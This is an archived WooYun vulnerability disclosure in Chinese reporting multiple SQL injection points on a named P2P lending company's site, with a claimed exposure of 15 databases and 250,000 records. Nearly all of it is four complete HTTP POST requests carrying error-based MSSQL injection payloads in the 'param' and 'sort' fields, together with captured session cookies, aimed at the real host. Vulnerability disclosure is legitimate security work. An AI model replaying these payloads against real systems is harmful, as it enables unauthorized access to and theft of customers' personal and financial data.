乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-04-07: 细节已通知厂商并且等待厂商处理中 2016-04-12: 厂商已经主动忽略漏洞,细节向公众公开
P2P金融安全之OK贷某站多处sql注入漏洞&&15个库&&25万数据信息
注入点一:
POST /Website/abouts/DeleteAboutsRemove HTTP/1.1Content-Length: 180Content-Type: application/x-www-form-urlencodedCookie: ASP.NET_SessionId=lq3x5ymp2zfqfzagiddnfvwd; Hm_lvt_cac91bdc3b32aef443464f95b91a41fa=1459779037,1459779071,1459779091,1459779113; Hm_lpvt_cac91bdc3b32aef443464f95b91a41fa=1459779113; HMACCOUNT=FED91CA2363927EB; cod=; csd=96Host: mail.okdai.com:8888Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*param%5B0%5D=(select%20convert(int%2cCHAR(52)%2bCHAR(67)%2bCHAR(117)%2bCHAR(81)%2bCHAR(78)%2bCHAR(52)%2bCHAR(100)%2bCHAR(51)%2bCHAR(119)%2bCHAR(51)%2bCHAR(88))%20FROM%20syscolumns)
注入参数:param%5B0%5D注入点二:
POST /Website/Feedback/GetFeedbackList HTTP/1.1Content-Length: 197Content-Type: application/x-www-form-urlencodedCookie: ASP.NET_SessionId=lq3x5ymp2zfqfzagiddnfvwd; Hm_lvt_cac91bdc3b32aef443464f95b91a41fa=1459779037,1459779071,1459779091,1459779113; Hm_lpvt_cac91bdc3b32aef443464f95b91a41fa=1459779113; HMACCOUNT=FED91CA2363927EB; cod=; csd=96Host: mail.okdai.com:8888Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*order=DESC&page=1&rows=15&sort=(select%20convert(int%2cCHAR(52)%2bCHAR(67)%2bCHAR(117)%2bCHAR(74)%2bCHAR(115)%2bCHAR(55)%2bCHAR(81)%2bCHAR(55)%2bCHAR(52)%2bCHAR(87)%2bCHAR(50))%20FROM%20syscolumns)
注入参数:sort注入点三:
POST /Website/Home/GetFriendDatas HTTP/1.1Content-Length: 207Content-Type: application/x-www-form-urlencodedCookie: ASP.NET_SessionId=lq3x5ymp2zfqfzagiddnfvwd; Hm_lvt_cac91bdc3b32aef443464f95b91a41fa=1459779037,1459779071,1459779091,1459779113; Hm_lpvt_cac91bdc3b32aef443464f95b91a41fa=1459779113; HMACCOUNT=FED91CA2363927EB; cod=; csd=96Host: mail.okdai.com:8888Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*order=DESC&page=1&rows=15&sort=(select%20convert(int%2cCHAR(52)%2bCHAR(67)%2bCHAR(117)%2bCHAR(118)%2bCHAR(74)%2bCHAR(50)%2bCHAR(51)%2bCHAR(81)%2bCHAR(88)%2bCHAR(84)%2bCHAR(111))%20FROM%20syscolumns)&StrKey=e
注入参数:sort注入点四:
POST /Website/News/VidelListDetail HTTP/1.1Content-Length: 200Content-Type: application/x-www-form-urlencodedCookie: ASP.NET_SessionId=lq3x5ymp2zfqfzagiddnfvwd; Hm_lvt_cac91bdc3b32aef443464f95b91a41fa=1459779037,1459779071,1459779091,1459779113; Hm_lpvt_cac91bdc3b32aef443464f95b91a41fa=1459779113; HMACCOUNT=FED91CA2363927EB; cod=; csd=96Host: mail.okdai.com:8888Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*order=DESC&page=1&rows=15&sort=(select%20convert(int%2cCHAR(52)%2bCHAR(67)%2bCHAR(117)%2bCHAR(117)%2bCHAR(114)%2bCHAR(108)%2bCHAR(79)%2bCHAR(76)%2bCHAR(54)%2bCHAR(105)%2bCHAR(53))%20FROM%20syscolumns)
注入参数:sort
过滤
危害等级:无影响厂商忽略
忽略时间:2016-04-12 09:20
漏洞Rank:15 (WooYun评价)
暂无